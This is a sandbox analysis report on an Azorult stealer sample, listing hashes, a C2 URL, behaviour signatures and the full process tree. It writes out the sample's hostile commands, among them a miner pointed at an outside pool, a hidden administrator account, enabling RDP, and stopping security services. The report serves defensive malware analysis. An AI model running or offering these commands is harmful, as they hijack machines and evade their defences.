Resubmissions

12-09-2024 02:23

240912-cvfznswere 10

04-09-2024 00:09

240904-afvheascla 10

03-09-2024 18:57

240903-xl8csavfrb 10

03-09-2024 18:12

240903-ws828asgnm 10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-09-2024 18:12

General

  • Target

    Stealers/Azorult.exe

  • Size

    10.6MB

  • MD5

    5e25abc3a3ad181d2213e47fa36c4a37

  • SHA1

    ba365097003860c8fb9d332f377e2f8103d220e0

  • SHA256

    3e385633fc19035dadecf79176a763fe675429b611dac5af2775dd3edca23ab9

  • SHA512

    676596d21cab10389f47a3153d53bbd36b161c77875a4e4aa976032770cb4ec7653c521aaeda98ab4da7777e49f426f4019298d5fc4ed8be2f257e9d0868d681

  • SSDEEP

    196608:Lj43l1SYnShCcjEtOsZ1MJWTqHkzNcWUU5QH7MiXBhxsns3qveh1DCJv/zdM:LGzUCcUOmKoTqH0N9UV7VxHsnpjXK

Malware Config

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs 5 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocklisted process makes network request 11 IoCs
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 4 IoCs
  • Modifies Windows Firewall 2 TTPs 64 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 22 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 23 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 8 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 6 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stealers\Azorult.exe
    "C:\Users\Admin\AppData\Local\Temp\Stealers\Azorult.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • UAC bypass
    • Blocklisted process makes network request
    • Blocks application from running via registry modification
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • Modifies system certificate store
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2072
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1332
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • UAC bypass
            • Windows security bypass
            • Hide Artifacts: Hidden Users
            • Runs .reg file with regedit
            PID:2372
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:1956
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:2860
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1720
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:352
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1924
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:1872
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:1680
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1888
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            5⤵
            • Launches sc.exe
            PID:2308
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            5⤵
            • Launches sc.exe
            PID:2276
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        PID:1884
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Programdata\Install\del.bat
          4⤵
            PID:2352
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:2700
      • C:\ProgramData\install\sys.exe
        C:\ProgramData\install\sys.exe
        2⤵
        • Executes dropped EXE
        PID:2448
      • C:\programdata\install\cheat.exe
        C:\programdata\install\cheat.exe -pnaxui
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2512
        • C:\ProgramData\Microsoft\Intel\taskhost.exe
          "C:\ProgramData\Microsoft\Intel\taskhost.exe"
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • Drops file in Windows directory
          PID:2928
          • C:\Programdata\RealtekHD\taskhostw.exe
            C:\Programdata\RealtekHD\taskhostw.exe
            4⤵
            • Modifies visiblity of hidden/system files in Explorer
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • NTFS ADS
            • Suspicious behavior: GetForegroundWindowSpam
            PID:1104
            • C:\Programdata\WindowsTask\winlogon.exe
              C:\Programdata\WindowsTask\winlogon.exe
              5⤵
              • Executes dropped EXE
              PID:1972
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                6⤵
                  PID:1916
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /query /fo list
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:904
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
                  6⤵
                  • Indicator Removal: Clear Persistence
                  PID:2120
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
                    7⤵
                      PID:1996
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                  5⤵
                    PID:2768
                    • C:\Windows\system32\ipconfig.exe
                      ipconfig /flushdns
                      6⤵
                      • Gathers network information
                      PID:1948
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c gpupdate /force
                    5⤵
                      PID:1824
                      • C:\Windows\system32\gpupdate.exe
                        gpupdate /force
                        6⤵
                          PID:2852
                      • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                        C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t4
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:548
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
                      4⤵
                        PID:1120
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
                          5⤵
                          • Modifies file permissions
                          PID:1328
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
                        4⤵
                          PID:2156
                          • C:\Windows\SysWOW64\icacls.exe
                            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
                            5⤵
                            • Modifies file permissions
                            PID:2804
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
                          4⤵
                            PID:2628
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
                              5⤵
                                PID:352
                            • C:\programdata\microsoft\intel\R8.exe
                              C:\programdata\microsoft\intel\R8.exe
                              4⤵
                              • Executes dropped EXE
                              PID:1944
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                                5⤵
                                  PID:2276
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\rdp\pause.bat" "
                                    6⤵
                                    • Loads dropped DLL
                                    PID:2576
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im Rar.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2504
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im Rar.exe
                                      7⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2300
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout 3
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      • Delays execution with timeout.exe
                                      PID:1148
                                    • C:\Windows\SysWOW64\chcp.com
                                      chcp 1251
                                      7⤵
                                        PID:2396
                                      • C:\rdp\Rar.exe
                                        "Rar.exe" e -p555 db.rar
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2392
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im Rar.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3052
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout 2
                                        7⤵
                                        • Delays execution with timeout.exe
                                        PID:2060
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                                        7⤵
                                          PID:2864
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ""C:\rdp\bat.bat" "
                                            8⤵
                                            • Loads dropped DLL
                                            PID:1980
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                              9⤵
                                                PID:2188
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                                9⤵
                                                  PID:936
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                                  9⤵
                                                  • Modifies Windows Firewall
                                                  PID:924
                                                • C:\Windows\SysWOW64\net.exe
                                                  net.exe user "john" "12345" /add
                                                  9⤵
                                                    PID:1272
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 user "john" "12345" /add
                                                      10⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1288
                                                  • C:\Windows\SysWOW64\chcp.com
                                                    chcp 1251
                                                    9⤵
                                                      PID:2368
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net localgroup "Администраторы" "John" /add
                                                      9⤵
                                                        PID:1864
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                          10⤵
                                                            PID:2584
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net localgroup "Administratorzy" "John" /add
                                                          9⤵
                                                            PID:1140
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                              10⤵
                                                                PID:2660
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net localgroup "Administrators" John /add
                                                              9⤵
                                                                PID:1872
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                                  10⤵
                                                                    PID:1260
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net localgroup "Administradores" John /add
                                                                  9⤵
                                                                    PID:1448
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                      10⤵
                                                                        PID:2120
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                      9⤵
                                                                        PID:1960
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                          10⤵
                                                                            PID:1940
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net localgroup "Пользователи удаленного управления" John /add
                                                                          9⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2448
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                            10⤵
                                                                              PID:1888
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net localgroup "Remote Desktop Users" John /add
                                                                            9⤵
                                                                            • Remote Service Session Hijacking: RDP Hijacking
                                                                            PID:1332
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                              10⤵
                                                                              • Remote Service Session Hijacking: RDP Hijacking
                                                                              PID:2284
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net localgroup "Usuarios de escritorio remoto" John /add
                                                                            9⤵
                                                                              PID:2464
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                10⤵
                                                                                  PID:1224
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                9⤵
                                                                                  PID:292
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                    10⤵
                                                                                      PID:2432
                                                                                  • C:\rdp\RDPWInst.exe
                                                                                    "RDPWInst.exe" -i -o
                                                                                    9⤵
                                                                                    • Server Software Component: Terminal Services DLL
                                                                                    • Executes dropped EXE
                                                                                    • Modifies WinLogon
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2568
                                                                                    • C:\Windows\system32\netsh.exe
                                                                                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                      10⤵
                                                                                      • Modifies Windows Firewall
                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                      PID:2260
                                                                                  • C:\rdp\RDPWInst.exe
                                                                                    "RDPWInst.exe" -w
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:268
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                    9⤵
                                                                                    • Hide Artifacts: Hidden Users
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2584
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net accounts /maxpwage:unlimited
                                                                                    9⤵
                                                                                      PID:1564
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                        10⤵
                                                                                          PID:612
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                        9⤵
                                                                                        • Sets file to hidden
                                                                                        • Drops file in Program Files directory
                                                                                        • Views/modifies file attributes
                                                                                        PID:764
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                        9⤵
                                                                                        • Sets file to hidden
                                                                                        • Drops file in Program Files directory
                                                                                        • Views/modifies file attributes
                                                                                        PID:1972
                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                        attrib +s +h "C:\rdp"
                                                                                        9⤵
                                                                                        • Sets file to hidden
                                                                                        • Views/modifies file attributes
                                                                                        PID:1140
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout 2
                                                                                    7⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:2796
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:892
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc start appidsvc
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:308
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                              4⤵
                                                                                PID:2212
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc start appmgmt
                                                                                  5⤵
                                                                                  • Launches sc.exe
                                                                                  PID:2124
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                4⤵
                                                                                  PID:688
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc config appidsvc start= auto
                                                                                    5⤵
                                                                                    • Launches sc.exe
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1588
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                  4⤵
                                                                                    PID:2776
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc config appmgmt start= auto
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2912
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                    4⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2424
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc delete swprv
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2676
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                    4⤵
                                                                                      PID:2932
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc stop mbamservice
                                                                                        5⤵
                                                                                        • Launches sc.exe
                                                                                        PID:2924
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                      4⤵
                                                                                        PID:2684
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          sc stop bytefenceservice
                                                                                          5⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2844
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                        4⤵
                                                                                          PID:1000
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc delete bytefenceservice
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1788
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                          4⤵
                                                                                            PID:3036
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc delete mbamservice
                                                                                              5⤵
                                                                                              • Launches sc.exe
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2180
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                            4⤵
                                                                                              PID:1040
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc delete crmsvc
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1736
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sc delete "windows node"
                                                                                              4⤵
                                                                                                PID:2776
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc delete "windows node"
                                                                                                  5⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1948
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                                                4⤵
                                                                                                  PID:2972
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop Adobeflashplayer
                                                                                                    5⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2668
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                                                  4⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2640
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc delete AdobeFlashPlayer
                                                                                                    5⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2772
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                                  4⤵
                                                                                                    PID:2696
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop MoonTitle
                                                                                                      5⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2848
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2472
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc delete MoonTitle"
                                                                                                      5⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2000
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                                    4⤵
                                                                                                      PID:936
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc stop clr_optimization_v4.0.30318_64
                                                                                                        5⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:1976
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                                      4⤵
                                                                                                        PID:2664
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc delete clr_optimization_v4.0.30318_64"
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1272
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1564
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc stop MicrosoftMysql
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1864
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                                        4⤵
                                                                                                          PID:952
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc delete MicrosoftMysql
                                                                                                            5⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1068
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                          4⤵
                                                                                                            PID:2660
                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                              netsh advfirewall set allprofiles state on
                                                                                                              5⤵
                                                                                                              • Modifies Windows Firewall
                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                              PID:1940
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                            4⤵
                                                                                                              PID:1996
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                5⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                PID:3016
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                              4⤵
                                                                                                                PID:2508
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                  5⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  PID:2452
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2432
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                  5⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  PID:2780
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                4⤵
                                                                                                                  PID:1904
